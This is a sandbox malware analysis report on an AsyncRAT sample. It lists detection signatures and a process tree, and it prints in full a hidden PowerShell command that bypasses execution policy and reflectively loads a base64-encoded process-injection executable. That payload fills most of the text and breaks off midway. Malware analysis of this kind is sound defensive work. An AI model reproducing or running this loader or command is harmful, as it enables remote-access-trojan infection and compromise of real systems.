Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bad.txt

Overview

General Information

Sample name:bad.txt
Analysis ID:1578479
MD5:d02c187310eadf963c0d57378b8595fc
SHA1:c8c42bd1d0eee9c27a7718b478492ca5835b04dd
SHA256:e312dfddeb5ba9867345de8a4926b449854fb3ea90355c0f4150bbcb49593852
Infos:

Detection

AsyncRAT
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected AsyncRAT
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Base64 MZ Header In CommandLine
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64_ra
  • notepad.exe (PID: 6984 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\Desktop\bad.txt MD5: 27F71B12CB585541885A31BE22F61C83)
  • svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cmd.exe (PID: 1364 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\bad.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5508 cmdline: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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BHI3AABwKA0AAAZvNwAACigOAAAGCiAVNAAAKDMAAAooOAAACn4QAAAEbx4AAAoGFigMAAAGFig5AAAKKgAAABMwAwAwAAAABAAAEQNvOgAAChfaF9YX2hfWjTQAAAEKAwYWbzsAAAoCGgYoEgAABhb+ASwGczwAAAp6KiYCA4EBAAAbAyoAABMwBQBeAAAABQAAERaNNAAAAQoWCwIaBhYSASgRAAAGJgcWNwoHbiD/fwAAajEGczwAAAp6AhoSAAduF2rbhBfWF9oX1o00AAABKAEAACsHEgEoEQAABhb+ASwGczwAAAp6BhZzPQAACioAABMwCAAwAAAABgAAEQIoFQAABgoGbz4AAAoWFhcg/w8PABcUcz8AAAoWFHNAAAAKb0EAAAoCBigTAAAGKpYgAAwAACgtAAAKcy4AAAoCb0IAAApyaQAAcH4iAAAKb0MAAAoqAAATMAQAVgMAAAAAAAAejTQAAAEl0BEAAAQoRAAACigIAAAGHwyNNAAAASXQFgAABChEAAAKKAgAAAYoAgAAK4AEAAAEHo00AAABJdARAAAEKEQAAAooCAAABh8VjTQAAAEl0BkAAAQoRAAACigIAAAGKAMAACuABQAABB6NNAAAASXQEQAABChEAAAKKAgAAAYfEI00AAABJdAaAAAEKEQAAAooCAAABigEAAArgAYAAAQejTQAAAEl0BEAAAQoRAAACigIAAAGHxWNNAAAASXQHQAABChEAAAKKAgAAAYoBQAAK4AHAAAEHo00AAABJdARAAAEKEQAAAooCAAABh8QjTQAAAEl0BgAAAQoRAAACigIAAAGKAYAACuACAAABB6NNAAAASXQEQAABChEAAAKKAgAAAYfDo00AAABJdAcAAAEKEQAAAooCAAABigHAAArgAkAAAQejTQAAAEl0BEAAAQoRAAACigIAAAGHxKNNAAAASXQEgAABChEAAAKKAgAAAYoCAAAK4AKAAAEHo00AAABJdARAAAEKEQAAAooCAAABh8RjTQAAAEl0BcAAAQoRAAACigIAAAGKAkAACuACwAABBuNNAAAASXQFAAABChEAAAKKAgAAAYfFI00AAABJdATAAAEKEQAAAooCAAABigKAAArgAwAAAQejTQAAAEl0BEAAAQoRAAACigIAAAGHw6NNAAAASXQGwAABChEAAAKKAgAAAYoCwAA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AQC4EAAgAQBzCAAAAQAlEQAgAgBzCAAAAQB4CAAAAgCnBwAAAQAKDAAAAgDbBQAAAwB+EQAAAAAAAAAAAQBIBgAAAQA4DAAAAQAkEgAAAQBUCAAAAgBjDQIAAwBUDwAABAAaDAAABQCABwAAAQBUCAAAAgBjDQEAAwBUDwAAAQBNCAAAAgC4DwAAAQCYEQAAAgB4CwAAAQBNCAAAAQBNCAAAAQDbEgAAAQBvEQAAAgCnBwAAAQBbCAAAAQBbCAAAAgBIDAAAAwBvEQAAAQC9EQAAAQBvEQAAAgCnBwAAAQB5BwAAAgDUBQAAAQB5BwAAAgDUBQAAAwBIDAAABABvEQAAAQC9EQAAAQBvEQAAAgCnBwAAAQB5BwAAAgDUBQAAAQB5BwAAAgDUBQAAAwBIDAAABABvEQAAAQC9EQAAAQBvEQAAAgCnBwAAAQB5BwAAAgDUBQAAAQB5BwAAAgDUBQAAAwBIDAAABABvEQAAAQC9EQAAAQBvEQAAAgCnBwAAAQB5BwAAAgDUBQAAAQB5BwAAAgDUBQAAAwBIDAAABABvEQAAAQC9EQAAAQBvEQAAAgCnBwAAAQBbCAAAAgBFEQAAAwAzDAAABAC5CAAABQB+EQAAAQBbCAAAAgBFEQAAAwAzDAAABAC5CAAABQB+EQAABgBIDAAABwBvEQAAAQC9EQAAAQBvEQAAAgCnBwAAAQAuEQAAAgBrBQAAAwB/DgAABACUCwAABQAYDQAAAQAuEQAAAgBrBQAAAwB/DgAABACUCwAABQAYDQAABgBIDAAABwBvEQAAAQAYDQAAAgC9EQAAAQBvEQAAAgCnBwAAAQAuEQAAAgBrBQAAAwB/DgAABACUCwAABQBaBwAAAQAuEQAAAgBrBQAAAwB/DgAABACUCwAABQBaBwAABgBIDAAABwBvEQAAAQB/DgAAAgBaBwAAAwC9EQAAAQBvEQAAAgCnBwAAAQAuEQAAAgBrBQAAAQAuEQAAAgBrBQAAAwBIDAAABABvEQAAAQC9EQAAAQBvEQAAAgCnBwAAAQBoCAAAAgB9CAAAAwCdEAAABACMEAAABQB9EAAABgDHEAAABwDaEQAACACEEgAACQARDgAACgBQDQAAAQBoCAAAAgB9CAAAAwCdEAAABACMEAAABQB9EAAABgDHEAAABwDaEQAACACEEgAACQARDgAACgBQDQAACwBIDAAADABvEQAAAQARDgAAAgBQDQAAAwC9EQkALQ8BABEALQ8GABkALQ8KACkALQ8QADEALQ8QADkALQ8QAEEALQ8QAEkALQ8QAFEALQ8QAFkALQ8QAGEALQ8VAGkALQ8QAHEALQ8QAHkALQ8QAIkALQ8aAJEALQ8GAJkALQ8gAKEALQ8GAKkALQ8GANEALQ8mAOEALQ8GAOkALQ8GALEALQ8GADkBLQgsADkBOBI1ALkALQ87ANkALQ8GAFEBkAdDAFkBLwNMAFkBAAxSAGEB+Q5bAGEBnwuDAHEBBgGKAHkB1RKPAIEBHQ6SAIkBLQ8GAJEBDwGVAIEBiwucAJEBrAKgAKkBRRKnAJEBrxC0AHEBDwG6ALkBSwe/ALkBsgwGAMEBtwzLANEBLQ8GADkBnQfSAOkB9AfZAHkBDwzmAHkBDBHqAPEBIg70APkB5hH5ABQAFQkYARQAkRElARwA9Ac0AVkBPgZMABECnxH0ABkCIgzmABkC+Qw9ASECLQ8GAPEALQ89AfEAegxUATECLQ9aAUECLQ9kASkCwwd1AdEB6At9AXkBzQeCAWECKBKIAXEC9wvEAXkBYRHJAQgAsADhAQgAtADmAQgAuADrAQgAvADwAQgAwAD1AQgAxAD6AQgAyAD/AQgAzAAEAggA0AAJAggA1AAOAggA2AATAggA3AAYAggA4AAdAggA5AAiAggA6AAnAggA7AAsAggA8AAxAggA9AAOAggA+AA2AicAgwAYAikAowD3BC4ACwDPBC4AEwDYBC4AGwD3BC4AIwAABS4AKwAKBS4AMwAKBS4AOwAKBS4AQwAABS4ASwAQBS4AUwAKBS4AWwAKBS4AYwAoBS4AawBSBS4AcwBfBUMAiwCpBUMAkwAYAkMAmwAYAkkAowD3BGMAmwAYAmMAiwDrBaMAmwAYAmQBswAYAoABqwAYAoQBswAYAmMCmwAYAgcA3gILAN4CTADbAggABgA7AgEAAAAAABAAAQAAAAAAEQABAAUAAAAUAAEADAAAABUAAQAOAAAAFgABABAAAAAXAAEAEQAAABgAAQASAAAAGQABABQAAAAaAAEAFQAAABsAAQBBAAAAHABlAMYA4ADvAEQBTwECAAEAAwADAAAAig7ABAAA6gjFBAAAqBHKBAIAAgADAAIAAwAFAAEABAAFAAIABQAHAP0ApQxYAAgBKQFAARMA+wMBAEMBFQA2EQEAQAEjAKUSAgBAASUAvRICADBWAAARADhWAAASAFBWAAATAGhWAAAUAHBWAAAVALhWAAAWAMhWAAAXAOBWAAAYAPBWAAAZAAhXAAAaABhXAAAbAChXAAAcADhXAAAdAASAAAABAAAAAAAAAAAAAAAAAP8FAAAEAAAAAAAAAAAAAADPARQHAAAAAAQAAAAAAAAAAAAAAM8B8gwAAAAABAAAAAAAAAAAAAAAzwG+CAAAAAAKAAAAAAAAAAAAAADYAR0HAAAAAAQAAAAAAAAAAAAAANgBMA4AAAAAAAAAAAEAAAA4EAAABgAEAAcABAAIAAQACQAEAAoABAALAAQADAAEAA0ABAAOAAQADwAEABAABAARAAQAEgAEABMABAAUAAUAFQAFABYABQAXAAUAGAAFABkABQAaAAUAGwAFABwABQAAAAAAFwDiAwAAAAApAPwGKABKARYAkgEWAJcBFgCcARYAoQEWAKYBFgCrARYAsAEWALUBFgC6ARYAvwEAAABfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTIwADVBQzMwQjI4RkYzRkJEQzI1RDJFNTA1QkE2MEM3RDAwQjQ1OTU4Mzg5MEE3QzIxMjJCQjk0RTFDRTJFMzYxMzAAPD5wX18wADFDMzI5OTI0ODY1NzQxRTAyMjJEM0VBRDIzMDcyQ0ZCRUQxNEY5NkUyQjA0MzI1NzMwNjhFQjA2NDA1MTMxMDEAX19TdGF0aWNBcnJheUluaXRUeXBlU2l6ZT0yMQBEQ1BBXzEAQ2FsbFNpdGVgMQBSZXNlcnZlZDEAX19TdGF0aWNBcnJheUluaXRUeXBlU2l6ZT0xMgBrZXJuZWwzMgBUb1VJbnQzMgBUb0ludDMyAEE3NDIyMEZEOUU3Njk3NkRFRDQzNjREQTE4MzVCNzlERDUzMjI4RTFFNUYyNEM2Nzk0MENBNUQ1NTQ2RjY5ODIAUlBFMgBSZXNlcnZlZDIANkUwMjM1QTk0MjA3QjA5OUNENjg1NEQ3Qzg1QzBCQTREOTk2NDA4OUY0QzI0OTAzNDMzNDFFNUNCRjk0MEMxMwA8Pm9fXzMzAEZ1bmNgMwBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTE0AEY5MTkxNTU1NTI2MDlEQzg3NzUwQzdDQTMyOTNENEQ4NDk5Njc2MDM1ODFCRTRFMzQ0RjU1RkE1NURFQzU4RDQANzFDNjBFOUUzMTFBRTlBMEM0N0EzRDc1RTQ2MkE2ODgyM0QyREYwRTQ4Qjc1QjE5MURDQjZEMEZCM0E3QjUzNQBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTY1AF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9NQBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTE2AFRvSW50MTYARTY2NDhEREU2MTkzRDQxRjI4OTNDN0ZGQUIyM0RDQjMwRjYwNEU0RkY2QTRCMjMyOUFBNENBMjYxQUY3NTc1NgBfX1N0YXRpY0FycmF5SW5pdFR5cGVTaXplPTE3AF9fU3RhdGljQXJyYXlJbml0VHlwZVNpemU9MTgAZ2V0X1VURjgANjkyREEyODQzQ0JBQ0E5OUI4M0E5OTk0RTRBODRFREQwNzgyQTAxMDM3OTRFRUJBRjNDRENBNUY0Q0RGNTA4OQA0ODM2Mjg0QjlGMTc4REFDNTM5MkFDOEI0ODczNDgzNTREQTM4QTk5RUE0ODcyNEJBRDVEMzY5NjJGMzMyNEU5ADxNb2R1bGU+ADxQcml2YXRlSW1wbGVtZW50YXRpb25EZXRhaWxzPgBDQQBVUEEAUFJPQ0VTU19TRVRfUVVPVEEATG9hZExpYnJhcnlBADM2QzFEQTMzOEZDQjVFMzcyNEQxMkY0QThFNjk4NUIwM0Q2M0JBOUVFQkQ4MUUxQkY4RUY3QUVGQTM2NUY5NEIAODA3NzhEMDI5OTlGMEZFNzY2MjREMjQ2RTZEMDMyOTI1OEUzODI0MDBDRDFFRkQ3MTc4NjE3RTdGQTkyNzYwQwBXUklURV9EQUMAX0MAMkMwNDEyREU3QzlDQTg5QkExNzQxNDA1QUZFNDJCREJCRjVDNTkzQUY0MDFCQUU3QUFEOUU3NjE2MUNCMTUxRABQUk9DRVNTX0NSRUFURV9USFJFQUQAUFJPQ0VTU19WTV9SRUFEAFNUQU5EQVJEX1JJR0hUU19SRVFVSVJFRAA0Nzc3NkZFMDQyNEZFNjhBMDc0N0UzQ0M4MzI3NTVFQzk4OTQxQjNEQkNCNjhEQTYzNDRFRUI4Q0YzRDY3NUFFAFBST0NFU1NfRFVQX0hBTkRMRQBCQTRNRQBEZWxlZ2F0ZVdvdzY0R2V0VGhyZWFkTUlDNE1FAERlbGVnYXRlR2V0VGhyZWFkTUlDNE1FAERlbGVnYXRlV293NjRTZXRUaHJlYWRNSUM0TUUARGVsZWdhdGVTZXRUaHJlYWRNSUM0TUUAUEw0TUUAX0RTNE1FAFBST0NFU1NfU1VTUEVORF9SRVNVTUUAX0RPWF9SUEUAUFJPQ0VTU19URVJNSU5BVEUAREVMRVRFAFBST0NFU1NfVk1fV1JJVEUAU1lOQ0hST05JWkUAZ2V0X0FTQ0lJAEsAUkVBRF9DT05UUk9MAFBST0NFU1NfUVVFUllfTElNSVRFRF9JTkZPUk1BVElPTgBQUk9DRVNTX1NFVF9JTkZPUk1BVElPTgBQUk9DRVNTX1FVRVJZX0lORk9STUFUSU9OAFBST0NFU1NfVk1fT1BFUkFUSU9OAElURV9PV05FUgBfX1IAX0RTAFBST0NFU1NfQUxMX0FDQ0VTUwBQUk9DRVNTX0NSRUFURV9QUk9DRVNTAFQAR0hWAF9MQTRNRVBMWgB2YWx1ZV9fAG1zY29ybGliAE1pY3Jvc29mdC5WaXN1YWxCYXNpYwBNaXNjAFRocmVhZElkAFByb2Nlc3NJZABHZXRQcm9jZXNzQnlJZABieXRlc1JlYWQARGVsZWdhdGVSZXN1bWVUaHJlYWQAdGhyZWFkAGxwbkxlbmd0aE5lZWRlZABTeW5jaHJvbml6ZWQAR2V0TWV0aG9kAG1ldGhvZABHZW5lcmljQWNlAENvbW1vbkFjZQBJbnNlcnRBY2UAUmVwbGFjZQBkZWZhdWx0SW5zdGFuY2UARW5kSW52b2tlAEJlZ2luSW52b2tlAFRocmVhZEhhbmRsZQBSdW50aW1lRmllbGRIYW5kbGUAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAUHJvY2Vzc0hhbmRsZQBwcm9jZXNzSGFuZGxlAGhhbmRsZQBUaXRsZQBhcHBsaWNhdGlvbk5hbWUAbmFtZQBjb21tYW5kTGluZQBXZWxsS25vd25TaWRUeXBlAFZhbHVlVHlwZQBTZWN1cml0eVByb3RvY29sVHlwZQB0eXBlAFN5c3RlbS5Db3JlAGdldF9DdWx0dXJlAHNldF9DdWx0dXJlAHJlc291cmNlQ3VsdHVyZQBNZXRob2RCYXNlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAENyZWF0ZQBNdWx0aWNhc3REZWxlZ2F0ZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDYWxsU2l0ZQBEeW5hbWljQXR0cmlidXRlAFNUQVRocmVhZEF0dHJpYnV0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUAVW52ZXJpZmlhYmxlQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBTZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEJ5dGUAdmFsdWUAX0RPWF9SUEUuZXhlAGdldF9TaXplAGJ1ZmZlclNpemUAU2l6ZU9mAFN5c3RlbS5UaHJlYWRpbmcARW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBHZXRfTXlfU3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAEdldFN0cmluZwBwYXRoAGdldF9MZW5ndGgAbkxlbmd0aABnZXRfQmluYXJ5TGVuZ3RoAGxlbmd0aABBc3luY0NhbGxiYWNrAGNhbGxiYWNrAE1hcnNoYWwAU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbABSYXdBY2wAZ2V0X0Rpc2NyZXRpb25hcnlBY2wAU3lzdGVtLkNvbXBvbmVudE1vZGV